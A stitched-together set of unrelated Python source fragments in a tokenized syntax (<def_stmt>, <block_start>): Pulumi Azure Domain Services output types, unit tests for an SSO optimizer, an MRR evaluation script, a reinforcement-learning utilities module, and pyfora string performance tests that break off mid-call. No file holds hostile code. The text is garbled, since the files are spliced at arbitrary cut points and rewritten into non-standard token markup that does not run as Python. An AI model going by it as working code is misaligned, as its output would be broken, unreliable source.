self<arrow>Optional[bool]<block_start>""" Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_on_prem_passwords")<block_end>@property@pulumi.getter(name="tlsV1Enabled")<def_stmt>tls_v1_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable legacy TLS v1 support. Defaults to `false`. """<line_sep><return>pulumi.get(self "tls_v1_enabled")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceNotificationResult(dict)<block_start><def_stmt>__init__ __self__ * additional_recipients:Sequence[str] notify_dc_admins:bool notify_global_admins:bool<block_start>""" :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. :param bool notify_dc_admins: Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. :param bool notify_global_admins: Whether all Global Administrators are notified when there are alerts in the managed domain. """<line_sep>pulumi.set(__self__ "additional_recipients" additional_recipients)<line_sep>pulumi.set(__self__ "notify_dc_admins" notify_dc_admins)<line_sep>pulumi.set(__self__ "notify_global_admins" notify_global_admins)<block_end>@property@pulumi.getter(name="additionalRecipients")<def_stmt>additional_recipients self<arrow>Sequence[str]<block_start>""" A list of additional email addresses to notify when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "additional_recipients")<block_end>@property@pulumi.getter(name="notifyDcAdmins")<def_stmt>notify_dc_admins self<arrow>bool<block_start>""" Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_dc_admins")<block_end>@property@pulumi.getter(name="notifyGlobalAdmins")<def_stmt>notify_global_admins self<arrow>bool<block_start>""" Whether all Global Administrators are notified when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_global_admins")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceReplicaSetResult(dict)<block_start><def_stmt>__init__ __self__ * domain_controller_ip_addresses:Sequence[str] external_access_ip_address:str id:str location:str service_status:str subnet_id:str<block_start>""" :param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location in which the replica set resides. :param str service_status: The current service status for the replica set. :param str subnet_id: The ID of the subnet in which the replica set resides. """<line_sep>pulumi.set(__self__ "domain_controller_ip_addresses" domain_controller_ip_addresses)<line_sep>pulumi.set(__self__ "external_access_ip_address" external_access_ip_address)<line_sep>pulumi.set(__self__ "id" id)<line_sep>pulumi.set(__self__ "location" location)<line_sep>pulumi.set(__self__ "service_status" service_status)<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<block_end>@property@pulumi.getter(name="domainControllerIpAddresses")<def_stmt>domain_controller_ip_addresses self<arrow>Sequence[str]<block_start>""" A list of subnet IP addresses for the domain controllers in the replica set, typically two. """<line_sep><return>pulumi.get(self "domain_controller_ip_addresses")<block_end>@property@pulumi.getter(name="externalAccessIpAddress")<def_stmt>external_access_ip_address self<arrow>str<block_start>""" The publicly routable IP address for the domain controllers in the replica set. """<line_sep><return>pulumi.get(self "external_access_ip_address")<block_end>@property@pulumi.getter<def_stmt>id self<arrow>str<block_start>""" The ID of the Domain Service. """<line_sep><return>pulumi.get(self "id")<block_end>@property@pulumi.getter<def_stmt>location self<arrow>str<block_start>""" The Azure location in which the replica set resides. """<line_sep><return>pulumi.get(self "location")<block_end>@property@pulumi.getter(name="serviceStatus")<def_stmt>service_status self<arrow>str<block_start>""" The current service status for the replica set. """<line_sep><return>pulumi.get(self "service_status")<block_end>@property@pulumi.getter(name="subnetId")<def_stmt>subnet_id self<arrow>str<block_start>""" The ID of the subnet in which the replica set resides. """<line_sep><return>pulumi.get(self "subnet_id")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceSecureLdapResult(dict)<block_start><def_stmt>__init__ __self__ * certificate_expiry:str certificate_thumbprint:str enabled:bool external_access_enabled:bool public_certificate:str<block_start>""" :param bool enabled: Whether secure LDAP is enabled for the managed domain. :param bool external_access_enabled: Whether external access to LDAPS over the Internet, is enabled. """<line_sep>pulumi.set(__self__ "certificate_expiry" certificate_expiry)<line_sep>pulumi.set(__self__ "certificate_thumbprint" certificate_thumbprint)<line_sep>pulumi.set(__self__ "enabled" enabled)<line_sep>pulumi.set(__self__ "external_access_enabled" external_access_enabled)<line_sep>pulumi.set(__self__ "public_certificate" public_certificate)<block_end>@property@pulumi.getter(name="certificateExpiry")<def_stmt>certificate_expiry self<arrow>str<block_start><return>pulumi.get(self "certificate_expiry")<block_end>@property@pulumi.getter(name="certificateThumbprint")<def_stmt>certificate_thumbprint self<arrow>str<block_start><return>pulumi.get(self "certificate_thumbprint")<block_end>@property@pulumi.getter<def_stmt>enabled self<arrow>bool<block_start>""" Whether secure LDAP is enabled for the managed domain. """<line_sep><return>pulumi.get(self "enabled")<block_end>@property@pulumi.getter(name="externalAccessEnabled")<def_stmt>external_access_enabled self<arrow>bool<block_start>""" Whether external access to LDAPS over the Internet, is enabled. """<line_sep><return>pulumi.get(self "external_access_enabled")<block_end>@property@pulumi.getter(name="publicCertificate")<def_stmt>public_certificate self<arrow>str<block_start><return>pulumi.get(self "public_certificate")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceSecurityResult(dict)<block_start><def_stmt>__init__ __self__ * ntlm_v1_enabled:bool sync_kerberos_passwords:bool sync_ntlm_passwords:bool sync_on_prem_passwords:bool tls_v1_enabled:bool<block_start>""" :param bool ntlm_v1_enabled: Whether legacy NTLM v1 support is enabled. :param bool sync_kerberos_passwords: Whether Kerberos password hashes are synchronized to the managed domain. :param bool sync_ntlm_passwords: Whether NTLM password hashes are synchronized to the managed domain. :param bool sync_on_prem_passwords: Whether on-premises password hashes are synchronized to the managed domain. :param bool tls_v1_enabled: Whether legacy TLS v1 support is enabled. """<line_sep>pulumi.set(__self__ "ntlm_v1_enabled" ntlm_v1_enabled)<line_sep>pulumi.set(__self__ "sync_kerberos_passwords" sync_kerberos_passwords)<line_sep>pulumi.set(__self__ "sync_ntlm_passwords" sync_ntlm_passwords)<line_sep>pulumi.set(__self__ "sync_on_prem_passwords" sync_on_prem_passwords)<line_sep>pulumi.set(__self__ "tls_v1_enabled" tls_v1_enabled)<block_end>@property@pulumi.getter(name="ntlmV1Enabled")<def_stmt>ntlm_v1_enabled self<arrow>bool<block_start>""" Whether legacy NTLM v1 support is enabled. """<line_sep><return>pulumi.get(self "ntlm_v1_enabled")<block_end>@property@pulumi.getter(name="syncKerberosPasswords")<def_stmt>sync_kerberos_passwords self<arrow>bool<block_start>""" Whether Kerberos password hashes are synchronized to the managed domain. """<line_sep><return>pulumi.get(self "sync_kerberos_passwords")<block_end>@property@pulumi.getter(name="syncNtlmPasswords")<def_stmt>sync_ntlm_passwords self<arrow>bool<block_start>""" Whether NTLM password hashes are synchronized to the managed domain. """<line_sep><return>pulumi.get(self "sync_ntlm_passwords")<block_end>@property@pulumi.getter(name="syncOnPremPasswords")<def_stmt>sync_on_prem_passwords self<arrow>bool<block_start>""" Whether on-premises password hashes are synchronized to the managed domain. """<line_sep><return>pulumi.get(self "sync_on_prem_passwords")<block_end>@property@pulumi.getter(name="tlsV1Enabled")<def_stmt>tls_v1_enabled self<arrow>bool<block_start>""" Whether legacy TLS v1 support is enabled. """<line_sep><return>pulumi.get(self "tls_v1_enabled")<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>opytimizer.optimizers.swarm sso<import_from_stmt>opytimizer.spaces search<def_stmt>test_sso_params <block_start>params={'C_w':0.1 'C_p':0.4 'C_g':0.9}<line_sep>new_sso=sso.SSO(params=params)<assert_stmt>new_sso.C_w<eq>0.1<assert_stmt>new_sso.C_p<eq>0.4<assert_stmt>new_sso.C_g<eq>0.9<block_end><def_stmt>test_sso_params_setter <block_start>new_sso=sso.SSO()<try_stmt><block_start>new_sso.C_w='a'<block_end><except_stmt><block_start>new_sso.C_w=0.1<block_end><try_stmt><block_start>new_sso.C_w=-1<block_end><except_stmt><block_start>new_sso.C_w=0.1<block_end><assert_stmt>new_sso.C_w<eq>0.1<try_stmt><block_start>new_sso.C_p='b'<block_end><except_stmt><block_start>new_sso.C_p=0.4<block_end><try_stmt><block_start>new_sso.C_p=0.05<block_end><except_stmt><block_start>new_sso.C_p=0.4<block_end><assert_stmt>new_sso.C_p<eq>0.4<try_stmt><block_start>new_sso.C_g='c'<block_end><except_stmt><block_start>new_sso.C_g=0.9<block_end><try_stmt><block_start>new_sso.C_g=0.35<block_end><except_stmt><block_start>new_sso.C_g=0.9<block_end><assert_stmt>new_sso.C_g<eq>0.9<block_end><def_stmt>test_sso_compile <block_start>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<try_stmt><block_start>new_sso.local_position=1<block_end><except_stmt><block_start>new_sso.local_position=np.array([1])<block_end><assert_stmt>new_sso.local_position<eq>np.array([1])<block_end><def_stmt>test_sso_evaluate <block_start><def_stmt>square x<block_start><return>np.sum(x<power>2)<block_end>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<line_sep>new_sso.evaluate(search_space square)<block_end><def_stmt>test_sso_update <block_start>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<line_sep>new_sso.update(search_space)<block_end>
<import_stmt>argparse<import_stmt>csv<import_stmt>sys<import_stmt>os<line_sep>sys.path.append(os.path.dirname(os.path.dirname(__file__)))<import_from_stmt>modules.metric mean_reciprocal_rank<def_stmt>main csv_path<block_start>acc=0<line_sep>num=0<with_stmt>open(csv_path "r")<as>csv_file<block_start>csv_reader=csv.reader(csv_file delimiter=',')<line_sep>line_count=0<for_stmt>row csv_reader<block_start><if_stmt>line_count<g>0<block_start>hum_id=row[0].split(".")[0]<line_sep>preds=[]<for_stmt>col row[1:]<block_start>preds.append(str(col))<block_end>print(hum_id mean_reciprocal_rank(preds str(hum_id)))<line_sep>acc<augadd>mean_reciprocal_rank(preds str(hum_id))<line_sep>num<augadd>1<block_end>line_count<augadd>1<block_end>print(f'Processed {line_count} lines.')<block_end><return>acc/num<block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--csv_path" type=str required=<true> help="path to predict csv")<line_sep>args=parser.parse_args()<line_sep>mrr=main(args.csv_path)<line_sep>print("-----------------------------")<line_sep>print(f"MRR: {mrr}")<block_end>
<import_stmt>argparse<import_stmt>collections<import_stmt>inspect<import_stmt>json<import_stmt>logging<import_stmt>multiprocessing<as>mp<import_stmt>numpy<as>np<import_stmt>re<import_stmt>sys<import_stmt>zipfile<import_from_stmt>datetime datetime timedelta<import_from_stmt>os path listdir environ getpid<import_from_stmt>textwrap wrap<line_sep>PARALLEL_PROCESS_NUM=mp.cpu_count()<line_sep>TIMESTAMP_REGEX=r'(\d{4}_\d{2}_\d{2}_\d{6})'<line_sep>SPEC_PATH=path.join(path.dirname(__file__) 'spec')<line_sep>COMPONENT_LOCKS=json.loads(open(path.join(SPEC_PATH 'component_locks.json')).read())<line_sep>LOCK_HEAD_REST_SIG={# signature list of [head, rest] in component lock 'mutex':[[0 0] [1 1]] 'subset':[[0 0] [1 0] [1 1]] }<line_sep># parse_args to add flag parser=argparse.ArgumentParser(description='Set flags for functions')<line_sep>parser.add_argument("-b" "--blind" help="dont render graphics" action="store_const" dest="render" const=<false> default=<true>)<line_sep>parser.add_argument("-d" "--debug" help="activate debug log" action="store_const" dest="loglevel" const=logging.DEBUG default=logging.INFO)<line_sep>parser.add_argument("-e" "--experiment" help="specify experiment to run" action="store" type=str nargs='?' dest="experiment" default="dev_dqn")<line_sep>parser.add_argument("-p" "--param_selection" help="run parameter selection if present" action="store_true" dest="param_selection" default=<false>)<line_sep>parser.add_argument("-q" "--quiet" help="change log to warning level" action="store_const" dest="loglevel" const=logging.WARNING default=logging.INFO)<line_sep>parser.add_argument("-t" "--times" help="number of times session is run" action="store" nargs='?' type=int dest="times" default=1)<line_sep>parser.add_argument("-x" "--max_episodes" help="manually set environment max episodes" action="store" nargs='?' type=int dest="max_epis" default=-1)<line_sep>args=parser.parse_args([])<if>environ.get('CI')<else>parser.parse_args()<line_sep># Goddam python logger logger=logging.getLogger(__name__)<line_sep>handler=logging.StreamHandler(sys.stdout)<line_sep>handler.setFormatter(logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s'))<line_sep>logger.setLevel(args.loglevel)<line_sep>logger.addHandler(handler)<line_sep>logger.propagate=<false><line_sep>environ['TF_CPP_MIN_LOG_LEVEL']='3'# mute tf warnings on optimized setup <def_stmt>check_equal iterator<block_start>'''check if list contains all the same elements'''<line_sep>iterator=iter(iterator)<try_stmt><block_start>first=next(iterator)<block_end><except_stmt>StopIteration<block_start><return><true><block_end><return>all(first<eq>rest<for>rest iterator)<block_end><def_stmt>check_lock lock_name lock experiment_spec<block_start>''' refer to rl/spec/component_locks.json check a spec's component lock using binary signatures e.g. head = problem (discrete) rest = [Agent, Policy] (to be discrete too) first check if rest all has the same signature, i.e. same set then check pair [bin_head, bin_rest] in valid_lock_sig_list as specified by the lock's type '''<line_sep>lock_type=lock['type']<line_sep>valid_lock_sig_list=LOCK_HEAD_REST_SIG[lock_type]<line_sep>lock_head=lock['head']<line_sep>bin_head=(experiment_spec[lock_head]<in>lock[lock_head])<line_sep>bin_rest_list=[]<for_stmt>k,v_list lock.items()<block_start><if_stmt>k<in>experiment_spec<and>k<ne>lock_head<block_start>bin_rest_list.append(experiment_spec[k]<in>v_list)<block_end><block_end># rest must all have the same signature rest_equal=check_equal(bin_rest_list)<if_stmt><not>rest_equal<block_start>logger.warn('All components need to be of the same set, '<concat>'check component lock "{}" and your spec "{}"'.format(lock_name experiment_spec['experiment_name']))<block_end>bin_rest=bin_rest_list[0]<line_sep>lock_sig=[bin_head bin_rest]<line_sep>lock_valid=lock_sig<in>valid_lock_sig_list<if_stmt><not>lock_valid<block_start>logger.warn('Component lock violated: "{}", spec: "{}"'.format(lock_name experiment_spec['experiment_name']))<block_end><return>lock_valid<block_end><def_stmt>check_component_locks experiment_spec<block_start>''' check the spec components for all locks to ensure no lock is violated refer to rl/spec/component_locks.json '''<for_stmt>lock_name,lock COMPONENT_LOCKS.items()<block_start>check_lock(lock_name lock experiment_spec)<block_end><return><block_end># import and safeguard the PROBLEMS, EXPERIMENT_SPECS with checks <def_stmt>import_guard_asset <block_start>PROBLEMS=json.loads(open(path.join(SPEC_PATH 'problems.json')).read())<line_sep>EXPERIMENT_SPECS={}<line_sep>spec_files=[spec_json<for>spec_json listdir(SPEC_PATH)<if>spec_json.endswith('experiment_specs.json')]<for_stmt>filename spec_files<block_start>specs=json.loads(open(path.join(SPEC_PATH filename)).read())<line_sep>EXPERIMENT_SPECS.update(specs)<block_end>REQUIRED_PROBLEM_KEYS=['GYM_ENV_NAME' 'SOLVED_MEAN_REWARD' 'MAX_EPISODES' 'REWARD_MEAN_LEN']<line_sep>REQUIRED_SPEC_KEYS=['problem' 'Agent' 'HyperOptimizer' 'Memory' 'Optimizer' 'Policy' 'PreProcessor' 'param']<for_stmt>problem_name,problem PROBLEMS.items()<block_start><assert_stmt>all(k<in>problem<for>k REQUIRED_PROBLEM_KEYS) '{} needs all REQUIRED_PROBLEM_KEYS'.format(problem_name)<block_end><for_stmt>experiment_name,spec EXPERIMENT_SPECS.items()<block_start><assert_stmt>all(k<in>spec<for>k REQUIRED_SPEC_KEYS) '{} needs all REQUIRED_SPEC_KEYS'.format(experiment_name)<line_sep>EXPERIMENT_SPECS[experiment_name]['experiment_name']=experiment_name<line_sep>check_component_locks(spec)# check component_locks.json <if_stmt>'param_range'<not><in>EXPERIMENT_SPECS[experiment_name]<block_start><continue><block_end>param_range=EXPERIMENT_SPECS[experiment_name]['param_range']<for_stmt>param_key,param_val param_range.items()<block_start><if_stmt>isinstance(param_val list)<block_start>param_range[param_key]=sorted(param_val)<block_end><elif_stmt>isinstance(param_val dict)<block_start><pass><block_end><else_stmt><block_start><assert_stmt><false> 'param_range value must be list or dict: {}.{}:{}'.format(experiment_name param_key param_val)<block_end><block_end>EXPERIMENT_SPECS[experiment_name]['param_range']=param_range<block_end><return>PROBLEMS EXPERIMENT_SPECS<block_end>PROBLEMS,EXPERIMENT_SPECS=import_guard_asset()<def_stmt>log_self subject<block_start>max_info_len=300<line_sep>info='{}, param: {}'.format(subject.__class__.__name__ to_json(subject.__dict__))<line_sep>trunc_info=(info[:max_info_len]+'...'<if>len(info)<g>max_info_len<else>info)<line_sep>logger.debug(trunc_info)<block_end><def_stmt>wrap_text text<block_start><return>'\n'.join(wrap(text 60))<block_end><def_stmt>make_line line='-'<block_start><if_stmt>environ.get('CI')<block_start><return><block_end>columns=80<line_sep>line_str=line<times>int(columns)<line_sep><return>line_str<block_end><def_stmt>log_delimiter msg line='-'<block_start>delim_msg='''\n{0}\n{1}\n{0}\n\n'''.format(make_line(line) msg)<line_sep>logger.info(delim_msg)<block_end><def_stmt>log_trial_delimiter trial action<block_start>log_delimiter('{} Trial #{}/{} on PID {}:\n{}'.format(action trial.trial_num trial.num_of_trials getpid() trial.trial_id) '=')<block_end><def_stmt>log_session_delimiter sess action<block_start>log_delimiter('{} Session #{}/{} of Trial #{}/{} on PID {}:\n{}'.format(action sess.session_num sess.num_of_sessions sess.trial.trial_num sess.trial.num_of_trials getpid() sess.session_id))<block_end><def_stmt>timestamp <block_start>'''timestamp used for filename'''<line_sep>timestamp_str='{:%Y_%m_%d_%H%M%S}'.format(datetime.now())<assert_stmt>re.search(TIMESTAMP_REGEX timestamp_str)<line_sep><return>timestamp_str<block_end><def_stmt>timestamp_elapse s1 s2<block_start>'''calculate the time elapsed between timestamps from s1 to s2'''<line_sep>FMT='%Y_%m_%d_%H%M%S'<line_sep>delta_t=datetime.strptime(s2 FMT)-datetime.strptime(s1 FMT)<line_sep><return>str(delta_t)<block_end><def_stmt>timestamp_elapse_to_seconds s1<block_start>a=datetime.strptime(s1 '%H:%M:%S')<line_sep>secs=timedelta(hours=a.hour minutes=a.minute seconds=a.second).seconds<line_sep><return>secs<block_end># own custom sorted json serializer, cuz python <def_stmt>to_json o level=0<block_start>INDENT=2<line_sep>SPACE=" "<line_sep>NEWLINE="\n"<line_sep>ret=""<if_stmt>isinstance(o dict)<block_start>ret<augadd>"{"+NEWLINE<line_sep>comma=""<for_stmt>k sorted(o.keys())<block_start>v=o[k]<line_sep>ret<augadd>comma<line_sep>comma=",\n"<line_sep>ret<augadd>SPACE<times>INDENT<times>(level+1)<line_sep>ret<augadd>'"'+str(k)+'":'+SPACE<line_sep>ret<augadd>to_json(v level+1)<block_end>ret<augadd>NEWLINE+SPACE<times>INDENT<times>level+"}"<block_end><elif_stmt>isinstance(o str)<block_start>ret<augadd>'"'+o+'"'<block_end><elif_stmt>isinstance(o list)<or>isinstance(o tuple)<block_start>ret<augadd>"["+",".join([to_json(e level+1)<for>e o])+"]"<block_end><elif_stmt>isinstance(o bool)<block_start>ret<augadd>"true"<if>o<else>"false"<block_end><elif_stmt>isinstance(o int)<block_start>ret<augadd>str(o)<block_end><elif_stmt>isinstance(o float)<block_start>ret<augadd>'%.7g'%o<block_end><elif_stmt>isinstance(o np.ndarray)<and>np.issubdtype(o.dtype np.integer)<block_start>ret<augadd>"["+','.join(map(str o.flatten().tolist()))+"]"<block_end><elif_stmt>isinstance(o np.ndarray)<and>np.issubdtype(o.dtype np.inexact)<block_start>ret<augadd>"["+','.join(map(<lambda>x:'%.7g'%x o.flatten().tolist()))+"]"<block_end><elif_stmt>o<is><none><block_start>ret<augadd>'null'<block_end><elif_stmt>hasattr(o '__class__')<block_start>ret<augadd>'"'+o.__class__.__name__+'"'<block_end><else_stmt><block_start><raise>TypeError("Unknown type '%s' for json serialization"%str(type(o)))<block_end><return>ret<block_end># format object and its properties into printable dict <def_stmt>format_obj_dict obj keys<block_start><if_stmt>isinstance(obj dict)<block_start><return>to_json({k:obj.get(k)<for>k keys<if>obj.get(k)<is><not><none>})<block_end><else_stmt><block_start><return>to_json({k:getattr(obj k <none>)<for>k keys<if>getattr(obj k <none>)<is><not><none>})<block_end><block_end># cast dict to have flat values (int, float, str) <def_stmt>flat_cast_dict d<block_start><for_stmt>k d<block_start>v=d[k]<if_stmt><not>isinstance(v (int float))<block_start>d[k]=str(v)<block_end><block_end><return>d<block_end><def_stmt>flatten_dict d parent_key='' sep='_'<block_start>items=[]<for_stmt>k,v d.items()<block_start>new_key=parent_key+sep+k<if>parent_key<else>k<if_stmt>isinstance(v collections.MutableMapping)<block_start>items.extend(flatten_dict(v new_key sep=sep).items())<block_end><else_stmt><block_start>items.append((new_key v))<block_end><block_end><return>dict(items)<block_end><def_stmt>get_module GREF dot_path# get module from globals() by string dot_path <block_start>path_arr=dot_path.split('.')<line_sep># base level from globals mod=GREF.get(path_arr.pop(0))<for_stmt>deeper_path path_arr<block_start>mod=getattr(mod deeper_path)<block_end><return>mod<block_end><def_stmt>import_package_files globals_ locals_ __file__<block_start>''' Dynamically import all the public attributes of the python modules in this file's directory (the package directory) and return a list of their names. '''<line_sep>exports=[]<line_sep># globals_, locals_ = globals(), locals() package_path=path.dirname(__file__)<line_sep>package_name=path.basename(package_path)<for_stmt>filename listdir(package_path)<block_start>modulename,ext=path.splitext(filename)<if_stmt>modulename[0]<ne>'_'<and>ext<in>('.py' '.pyw')<block_start>subpackage='{}.{}'.format(package_name modulename)<line_sep># pkg relative module=__import__(subpackage globals_ locals_ [modulename])<line_sep>modict=module.__dict__<line_sep>names=(modict['__all__']<if>'__all__'<in>modict<else>[name<for>name modict<if>inspect.isclass(modict[name])])<line_sep># all public exports.extend(names)<line_sep>globals_.update((name modict[name])<for>name names)<block_end><block_end><return>exports<block_end><def_stmt>clean_id_str id_str<block_start><return>id_str.split('/').pop().split('.').pop(0)<block_end><def_stmt>parse_trial_id id_str<block_start>c_id_str=clean_id_str(id_str)<if_stmt>re.search(TIMESTAMP_REGEX c_id_str)<block_start>name_time_trial=re.split(TIMESTAMP_REGEX c_id_str)<if_stmt>len(name_time_trial)<eq>3<block_start><return>c_id_str<block_end><else_stmt><block_start><return><none><block_end><block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>parse_experiment_id id_str<block_start>c_id_str=clean_id_str(id_str)<if_stmt>re.search(TIMESTAMP_REGEX c_id_str)<block_start>name_time_trial=re.split(TIMESTAMP_REGEX c_id_str)<line_sep>name_time_trial.pop()<line_sep>experiment_id=''.join(name_time_trial)<line_sep><return>experiment_id<block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>parse_experiment_name id_str<block_start>c_id_str=clean_id_str(id_str)<line_sep>experiment_id=parse_experiment_id(c_id_str)<if_stmt>experiment_id<is><none><block_start>experiment_name=c_id_str<block_end><else_stmt><block_start>experiment_name=re.sub(TIMESTAMP_REGEX '' experiment_id).strip('-')<block_end><assert_stmt>experiment_name<in>EXPERIMENT_SPECS '{} not in EXPERIMENT_SPECS'.format(experiment_name)<line_sep><return>experiment_name<block_end><def_stmt>load_data_from_trial_id id_str<block_start>experiment_id=parse_experiment_id(id_str)<line_sep>trial_id=parse_trial_id(id_str)<line_sep>data_filename='./data/{}/{}.json'.format(experiment_id trial_id)<try_stmt><block_start>data=json.loads(open(data_filename).read())<block_end><except_stmt>(FileNotFoundError json.JSONDecodeError)<block_start>data=<none><block_end><return>data<block_end><def_stmt>load_data_array_from_experiment_id id_str# to load all ./data files for a series of trials <block_start>experiment_id=parse_experiment_id(id_str)<line_sep>data_path='./data/{}'.format(experiment_id)<line_sep>trial_id_array=[f<for>f listdir(data_path)<if>(path.isfile(path.join(data_path f))<and>f.startswith(experiment_id)<and>f.endswith('.json'))]<line_sep><return>list(filter(<none> [load_data_from_trial_id(trial_id)<for>trial_id trial_id_array]))<block_end><def_stmt>save_experiment_data data_df trial_id<block_start>experiment_id=parse_experiment_id(trial_id)<line_sep>filedir='./data/{0}'.format(experiment_id)<line_sep>filename='{0}_analysis_data.csv'.format(experiment_id)<line_sep>filepath='{}/{}'.format(filedir filename)<line_sep>data_df.round(6).to_csv(filepath index=<false>)<line_sep># zip the csv and best trial json for upload to PR zipfile.ZipFile(filepath+'.zip' mode='w').write(filepath arcname=filename)<line_sep>trial_filename=data_df.loc[0 'trial_id']+'.json'<line_sep>trial_filepath='{}/{}'.format(filedir trial_filename)<line_sep>zipfile.ZipFile(trial_filepath+'.zip' mode='w').write(trial_filepath arcname=trial_filename)<line_sep>logger.info('experiment data saved to {}'.format(filepath))<block_end><def_stmt>configure_hardware RAND_SEED<block_start>'''configure rand seed, GPU'''<import_from_stmt>keras backend<as>K<if_stmt>K.backend()<eq>'tensorflow'<block_start>K.tf.set_random_seed(RAND_SEED)<block_end><else_stmt><block_start>K.theano.tensor.shared_randomstreams.RandomStreams(seed=RAND_SEED)<block_end><if_stmt>K.backend()<ne>'tensorflow'# GPU config for tf only <block_start><return><block_end>process_num=PARALLEL_PROCESS_NUM<if>args.param_selection<else>1<line_sep>tf=K.tf<line_sep>gpu_options=tf.GPUOptions(allow_growth=<true> per_process_gpu_memory_fraction=1./float(process_num))<line_sep>config=tf.ConfigProto(gpu_options=gpu_options allow_soft_placement=<true>)<line_sep>sess=tf.Session(config=config)<line_sep>K.set_session(sess)<line_sep><return>sess<block_end><def_stmt>debug_mem_usage <block_start><import_stmt>psutil<import_from_stmt>mem_top mem_top<line_sep>pid=getpid()<line_sep>logger.debug('MEM USAGE for PID {}, MEM_INFO: {}\n{}'.format(pid psutil.Process().memory_info() mem_top()))<block_end><def_stmt>del_self_attr subject<block_start>self_attrs=list(subject.__dict__.keys())<for_stmt>attr self_attrs<block_start>delattr(subject attr)<block_end><import_stmt>gc<line_sep>gc.collect()<block_end># clone a keras model without file I/O <def_stmt>clone_model model custom_objects=<none><block_start><import_from_stmt>keras.models model_from_config<line_sep>custom_objects=custom_objects<or>{}<line_sep>config={'class_name':model.__class__.__name__ 'config':model.get_config() }<line_sep>clone=model_from_config(config custom_objects=custom_objects)<line_sep>clone.set_weights(model.get_weights())<line_sep><return>clone<block_end># clone a keras optimizer without file I/O <def_stmt>clone_optimizer optimizer<block_start><import_from_stmt>keras.optimizers optimizer_from_config<if_stmt>isinstance(optimizer str)<block_start><return>get(optimizer)<block_end>params=dict([(k v)<for>k,v optimizer.get_config().items()])<line_sep>config={'class_name':optimizer.__class__.__name__ 'config':params }<line_sep>clone=optimizer_from_config(config)<line_sep><return>clone<block_end>
# Copyright 2015 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>time<import_stmt>ufora.test.PerformanceTestReporter<as>PerformanceTestReporter<import_stmt>sys<class_stmt>StringTestCases(object)<block_start>"""Test cases for pyfora strings"""<def_stmt>test_string_indexing self<block_start><def_stmt>f <block_start>a="abc"<line_sep><return>(a[0] a[1] a[2] a[-1] a[-2])<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_strings_with_weird_characters self<block_start>x="\xb0"<def_stmt>f <block_start><return>(x "\xb0")<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_large_string_indexing_perf self<block_start><def_stmt>f ct passCt<block_start>x="asdfasdf"<times>(ct/8)<line_sep>res=0<for_stmt>_ xrange(passCt)<block_start><for_stmt>ix xrange(len(x))<block_start>res=res+len(x[ix])<block_end><block_end><return>res<block_end>self.evaluateWithExecutor(f 1000000 1)<line_sep>self.evaluateWithExecutor(f 10000 1)<line_sep>@PerformanceTestReporter.PerfTest("pyfora.string_indexing.large_string")<def_stmt>test1 <block_start>self.evaluateWithExecutor(f 1000000 100)<block_end>@PerformanceTestReporter.PerfTest("pyfora.string_indexing.small_string")<def_stmt>test2 <block_start>self.evaluateWithExecutor(f 10000 10000)<block_end>test1()<line_sep>test2()<block_end><def_stmt>test_large_string_parsing_perf self<block_start><def_stmt>f ct passCt<block_start>x="1,2,3,4,"<times>ct<line_sep>res=0<for_stmt>_ xrange(passCt)<block_start>ix=0<while_stmt>ix<l>len(x)<block_start>res=res+int(x[ix:ix+1])+12341234<line_sep>ix=ix+2<block_end><block_end><return>res<block_end>self.evaluateWithExecutor(f 1000000 1)<with_stmt>PerformanceTestReporter.RecordAsPerfTest("pyfora.string_to_int")<block_start>self.evaluateWithExecutor(f 1000000 10)<block_end><block_end><def_stmt>test_string_slicing self<block_start><def_stmt>f ct passCt chars<block_start>x="asdfasdf"<times>(ct/8)<line_sep>res=0<for_stmt>_ xrange(passCt)<block_start><for_stmt>ix xrange(len(x))<block_start>res=res+len(x[ix:ix+chars])<block_end><block_end><return>res<block_end>self.evaluateWithExecutor(f 1000000 1 2)<line_sep>self.evaluateWithExecutor(f 10000 1 2)<def_stmt>runTest func name<block_start>PerformanceTestReporter.PerfTest(name)(func)()<block_end>runTest(<lambda>:self.evaluateWithExecutor(f 1000000 10 2) "pyfora.string_slicing_10mm.2_char_large_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 1000000 10 200) "pyfora.string_slicing_10mm.200_char_large_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 10000 1000 2) 